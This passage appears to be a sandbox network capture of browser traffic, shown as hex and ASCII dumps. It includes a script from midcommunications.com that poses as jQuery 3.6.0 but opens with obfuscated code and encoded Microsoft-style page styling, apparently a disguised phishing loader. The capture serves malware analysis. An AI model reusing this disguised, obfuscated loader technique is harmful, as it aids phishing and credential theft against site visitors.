A%23fff%3Bcolor%3A%23000%3Bborder-style%3Asolid%3Bborder-width%3A2px%3Bborder-color%3Argba%280%2C0%2C0%2C.6%29%7Dinput%5Btype%3D%22radio%22%5D%3Achecked%3A%3A-ms-check%7Bcolor%3A%23000%3Bborder-color%3A%230067b8%7Dinput%5Btype%3D%22radio%22%5D%3Ahover%3A%
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 25 33 44 25 32 32 62 75 74 74 6f 6e 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 73 75 62 6d 69 74 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 65 73 65 74 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 37 42 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 25 33 41 72 67 62 61 25 32 38 30 25 32 43 30 25 32 43 30 25 32 43 2e 34 25 32 39 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 74 72 61 6e 73 70 61 72 65 6e 74 25 37 44 2e 62 74 6e 2e 64 69 73 61 62 6c 65 64 25 32 43 2e 62 74 6e 25 35 42 64 69 73 61 62 6c 65 64 Data Ascii: %3D%22button%22%5D.btn-primary%3Aactive%2Cinput%5Btype%3D%22submit%22%5D.btn-primary%3Aactive%2Cinput%5Btype%3D%22reset%22%5D.btn-primary%3Aactive%7Bbackground-color%3Argba%280%2C0%2C0%2C.4%29%3Bborder-color%3Atransparent%7D.btn.disabled%2C.btn%5Bdisabled
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 61 64 65 72 25 37 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 31 36 70 78 25 33 42 62 6f 72 64 65 72 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 33 42 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 25 33 41 30 25 37 44 2e 73 65 63 74 69 6f 6e 2e 69 74 65 6d 2d 73 65 63 74 69 6f 6e 25 32 30 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 25 37 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 66 6f 6e 74 2d 73 69 7a 65 25 33 41 31 35 70 78 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 32 30 70 78 25 33 42 66 6f 6e 74 2d 77 65 69 67 68 74 25 33 41 36 30 30 25 33 42 66 6f 6e 74 2d 73 69 7a 65 25 33 41 2e 39 33 37 35 72 65 6d 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 31 2e 32 35 72 65 6d 25 33 42 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 25 33 41 Data Ascii: ader%7Bmargin-bottom%3A16px%3Bborder-style%3Anone%3Bpadding-bottom%3A0%7D.section.item-section%20.section-title%7Bcolor%3A%23000%3Bfont-size%3A15px%3Bline-height%3A20px%3Bfont-weight%3A600%3Bfont-size%3A.9375rem%3Bline-height%3A1.25rem%3Bpadding-bottom%3A
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 61 72 67 69 6e 25 33 41 30 25 33 42 6c 69 6e 65 2d 68 65 69 67 68 74 25 33 41 31 2e 34 32 38 35 37 25 37 44 2e 6d 6f 64 61 6c 2d 62 6f 64 79 25 37 42 70 6f 73 69 74 69 6f 6e 25 33 41 72 65 6c 61 74 69 76 65 25 37 44 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 62 65 66 6f 72 65 25 32 43 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 61 66 74 65 72 25 37 42 63 6f 6e 74 65 6e 74 25 33 41 25 32 32 25 32 30 25 32 32 25 33 42 64 69 73 70 6c 61 79 25 33 41 74 61 62 6c 65 25 37 44 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 25 33 41 61 66 74 65 72 25 37 42 63 6c 65 61 72 25 33 41 62 6f 74 68 25 37 44 2e 6d 6f 64 61 6c 2d 73 63 72 6f 6c 6c 62 61 72 2d 6d 65 61 73 75 72 65 25 37 42 70 6f 73 69 74 69 6f 6e 25 33 41 61 62 73 6f 6c 75 74 65 25 33 42 74 6f 70 25 33 41 Data Ascii: argin%3A0%3Bline-height%3A1.42857%7D.modal-body%7Bposition%3Arelative%7D.modal-footer%3Abefore%2C.modal-footer%3Aafter%7Bcontent%3A%22%20%22%3Bdisplay%3Atable%7D.modal-footer%3Aafter%7Bclear%3Aboth%7D.modal-scrollbar-measure%7Bposition%3Aabsolute%3Btop%3A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	151.101.2.137	443	744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:41:49 UTC	586	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-07 12:41:49 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Tue, 07 Jan 2025 12:41:49 GMT Age: 2433322 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740063-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 5 X-Timer: S1736253710.628974,VS0,VE0 Vary: Accept-Encoding
2025-01-07 12:41:49 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-01-07 12:41:49 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-01-07 12:41:49 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-01-07 12:41:49 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-01-07 12:41:49 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-01-07 12:41:49 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	77.68.14.124	443	744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:41:49 UTC	377	OUT	GET /wp-includes/js/dist/bootstrap.js HTTP/1.1 Host: midcommunications.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-07 12:41:49 UTC	327	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:41:48 GMT Server: Apache Last-Modified: Mon, 06 Jan 2025 15:47:25 GMT Accept-Ranges: bytes Content-Length: 276886 Cache-Control: max-age=2592000 Expires: Thu, 06 Feb 2025 12:41:48 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/javascript
2025-01-07 12:41:49 UTC	7865	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 6a 71 75 65 72 79 2e 63 6f 6d 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 32 37 30 36 61 2c 5f 30 78 33 30 66 38 64 35 29 7b 76 61 72 20 5f 30 78 33 30 64 39 37 62 3d 5f 30 78 32 31 37 39 2c 5f 30 78 31 64 30 35 35 36 3d 5f 30 78 32 32 37 30 36 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 32 64 32 62 37 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 37 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 36 29 29 2f 30 78 33 29 2b 2d 70 61 72 Data Ascii: /! jQuery v3.6.0 jquery.com \| jquery.org/license /(function(_0x22706a,_0x30f8d5){var _0x30d97b=_0x2179,_0x1d0556=_0x22706a();while(!![]){try{var _0x52d2b7=parseInt(_0x30d97b(0x77))/0x1+parseInt(_0x30d97b(0x79))/0x2*(parseInt(_0x30d97b(0x76))/0x3)+-par
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 41 6a 75 73 74 69 66 79 25 37 44 2e 74 65 78 74 2d 6e 6f 77 72 61 70 25 37 42 77 68 69 74 65 2d 73 70 61 63 65 25 33 41 6e 6f 77 72 61 70 25 37 44 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 6c 6f 77 65 72 63 61 73 65 25 37 44 2e 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 75 70 70 65 72 63 61 73 65 25 37 44 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 63 61 70 69 74 61 6c 69 7a 65 25 37 44 75 6c 25 32 43 6f 6c 25 37 42 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 30 25 33 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 31 30 70 78 25 37 44 75 6c 25 32 30 75 6c 25 32 43 75 6c 25 Data Ascii: Ajustify%7D.text-nowrap%7Bwhite-space%3Anowrap%7D.text-lowercase%7Btext-transform%3Alowercase%7D.text-uppercase%7Btext-transform%3Auppercase%7D.text-capitalize%7Btext-transform%3Acapitalize%7Dul%2Col%7Bmargin-top%3A0%3Bmargin-bottom%3A10px%7Dul%20ul%2Cul%
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 65 73 25 32 32 25 35 44 25 37 42 6f 76 65 72 66 6c 6f 77 25 33 41 68 69 64 64 65 6e 25 37 44 2e 74 65 78 74 2d 6c 65 66 74 25 37 42 74 65 78 74 2d 61 6c 69 67 6e 25 33 41 6c 65 66 74 25 37 44 2e 74 65 78 74 2d 72 69 67 68 74 25 37 42 74 65 78 74 2d 61 6c 69 67 6e 25 33 41 72 69 67 68 74 25 37 44 2e 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 25 37 42 70 61 64 64 69 6e 67 2d 6c 65 66 74 25 33 41 30 25 33 42 6c 69 73 74 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 37 44 75 6c 25 37 42 70 61 64 64 69 6e 67 2d 6c 65 66 74 25 33 41 30 25 33 42 6c 69 73 74 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 37 44 75 6c 25 32 43 6f 6c 25 37 42 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 32 30 70 78 25 33 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 32 30 70 78 25 37 44 75 6c 25 Data Ascii: es%22%5D%7Boverflow%3Ahidden%7D.text-left%7Btext-align%3Aleft%7D.text-right%7Btext-align%3Aright%7D.list-unstyled%7Bpadding-left%3A0%3Blist-style%3Anone%7Dul%7Bpadding-left%3A0%3Blist-style%3Anone%7Dul%2Col%7Bmargin-top%3A20px%3Bmargin-bottom%3A20px%7Dul%
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 36 25 37 42 72 69 67 68 74 25 33 41 32 35 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 37 25 37 42 72 69 67 68 74 25 33 41 32 39 2e 31 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 38 25 37 42 72 69 67 68 74 25 33 41 33 33 2e 33 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 39 25 37 42 72 69 67 68 74 25 33 41 33 37 2e 35 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 30 25 37 42 72 69 67 68 74 25 33 41 34 31 2e 36 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 31 25 37 42 72 69 67 68 74 25 33 41 34 35 2e 38 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 32 25 37 42 72 69 67 68 74 25 Data Ascii: 25%7D.col-sm-pull-6%7Bright%3A25%25%7D.col-sm-pull-7%7Bright%3A29.16667%25%7D.col-sm-pull-8%7Bright%3A33.33333%25%7D.col-sm-pull-9%7Bright%3A37.5%25%7D.col-sm-pull-10%7Bright%3A41.66667%25%7D.col-sm-pull-11%7Bright%3A45.83333%25%7D.col-sm-pull-12%7Bright%
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 37 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 32 33 25 37 42 77 69 64 74 68 25 33 41 39 35 2e 38 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 32 34 25 37 42 77 69 64 74 68 25 33 41 31 30 30 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 30 25 37 42 72 69 67 68 74 25 33 41 61 75 74 6f 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 31 25 37 42 72 69 67 68 74 25 33 41 34 2e 31 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 32 25 37 42 72 69 67 68 74 25 33 41 38 2e 33 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 33 25 37 42 72 69 67 68 74 25 33 41 31 32 2e 35 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 34 25 37 42 72 69 67 68 74 25 33 41 31 36 2e 36 36 36 36 37 25 32 35 25 37 44 2e Data Ascii: 7%25%7D.col-lg-23%7Bwidth%3A95.83333%25%7D.col-lg-24%7Bwidth%3A100%25%7D.col-lg-pull-0%7Bright%3Aauto%7D.col-lg-pull-1%7Bright%3A4.16667%25%7D.col-lg-pull-2%7Bright%3A8.33333%25%7D.col-lg-pull-3%7Bright%3A12.5%25%7D.col-lg-pull-4%7Bright%3A16.66667%25%7D.
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 6c 61 79 25 33 41 62 6c 6f 63 6b 25 33 42 77 69 64 74 68 25 33 41 31 30 30 25 32 35 25 33 42 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 25 33 41 6e 6f 6e 65 25 37 44 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 25 37 42 68 65 69 67 68 74 25 33 41 61 75 74 6f 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 73 65 61 72 63 68 25 32 32 25 35 44 25 37 42 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 25 33 41 6e 6f 6e 65 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 64 61 74 65 25 32 32 25 35 44 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 74 69 6d 65 25 32 32 25 35 44 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 25 32 32 Data Ascii: lay%3Ablock%3Bwidth%3A100%25%3Bbackground-image%3Anone%7Dtextarea.form-control%7Bheight%3Aauto%7Dinput%5Btype%3D%22search%22%5D%7B-webkit-appearance%3Anone%7Dinput%5Btype%3D%22date%22%5D%2Cinput%5Btype%3D%22time%22%5D%2Cinput%5Btype%3D%22datetime-local%22
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 41 25 32 33 66 66 66 25 33 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 62 6f 72 64 65 72 2d 73 74 79 6c 65 25 33 41 73 6f 6c 69 64 25 33 42 62 6f 72 64 65 72 2d 77 69 64 74 68 25 33 41 32 70 78 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 72 67 62 61 25 32 38 30 25 32 43 30 25 32 43 30 25 32 43 2e 36 25 32 39 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 61 64 69 6f 25 32 32 25 35 44 25 33 41 63 68 65 63 6b 65 64 25 33 41 25 33 41 2d 6d 73 2d 63 68 65 63 6b 25 37 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 36 37 62 38 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 61 64 69 6f 25 32 32 25 35 44 25 33 41 68 6f 76 65 72 25 33 41 25 Data Ascii: A%23fff%3Bcolor%3A%23000%3Bborder-style%3Asolid%3Bborder-width%3A2px%3Bborder-color%3Argba%280%2C0%2C0%2C.6%29%7Dinput%5Btype%3D%22radio%22%5D%3Achecked%3A%3A-ms-check%7Bcolor%3A%23000%3Bborder-color%3A%230067b8%7Dinput%5Btype%3D%22radio%22%5D%3Ahover%3A%
2025-01-07 12:41:50 UTC	8000	IN	Data Raw: 25 33 44 25 32 32 62 75 74 74 6f 6e 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 73 75 62 6d 69 74 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 65 73 65 74 25 32 32 25 35 44 2e 62 74 6e 2d 70 72 69 6d 61 72 79 25 33 41 61 63 74 69 76 65 25 37 42 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 25 33 41 72 67 62 61 25 32 38 30 25 32 43 30 25 32 43 30 25 32 43 2e 34 25 32 39 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 74 72 61 6e 73 70 61 72 65 6e 74 25 37 44 2e 62 74 6e 2e 64 69 73 61 62 6c 65 64 25 32 43 2e 62 74 6e 25 35 42 64 69 73 61 62 6c 65 64 Data Ascii: %3D%22button%22%5D.btn-primary%3Aactive%2Cinput%5Btype%3D%22submit%22%5D.btn-primary%3Aactive%2Cinput%5Btype%3D%22reset%22%5D.btn-primary%3Aactive%7Bbackground-color%3Argba%280%2C0%2C0%2C.4%29%3Bborder-color%3Atransparent%7D.btn.disabled%2C.btn%5Bdisabled
